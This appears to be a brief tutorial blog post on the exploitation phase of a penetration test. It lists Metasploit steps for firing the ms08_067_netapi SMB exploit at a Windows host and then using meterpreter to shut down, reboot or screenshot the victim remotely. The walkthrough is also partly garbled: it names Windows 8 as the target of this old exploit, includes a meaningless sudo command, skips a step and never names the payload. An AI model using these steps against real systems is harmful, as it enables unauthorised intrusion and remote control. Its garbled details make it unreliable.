Target exploitation is one of the most important phases of a penetration test. It focuses on establishing access to a system by bypassing the security restrictions. An exploit itself is a piece of software or a sequence of command that takes advantage of a particular vulnerability which is the weakness in the system. Although exploits can occur in a variety of ways, one of the most common methods for exploits is launched from malicious websites. The victim could visit that malicious website by accident or they might be tricked by clicking that particular malicious website in a phishing email or a malicious advertisement. Target exploitation could be done by using Metasploit and below are the steps.
1. Make new IP address interface
– ifconfig (interface) (IPAddress) (subnetMask)
– sudo (interface) (ipAddress) (subnetMask) | To check only
2. Connect with the target by pinging them
– ping (IPAddress(target))
3. Start the Metasploit
– msfconsole
4. In this case, we try using Windows 8
– use windows/smb/ms08_067_netapi | Determine which target exploits
5. Check whether LHOST and RHOST are set or not
– show options
6. set LHOST (our IPAddress)
7. set RHOST (target’s IPAddress)
8. set PAYLOAD
10. exploit
Lastly, by using meterpreter, I could use a lot of commands such as shutdown, reboot, screenshot and other stuff that I could do remotely from my place.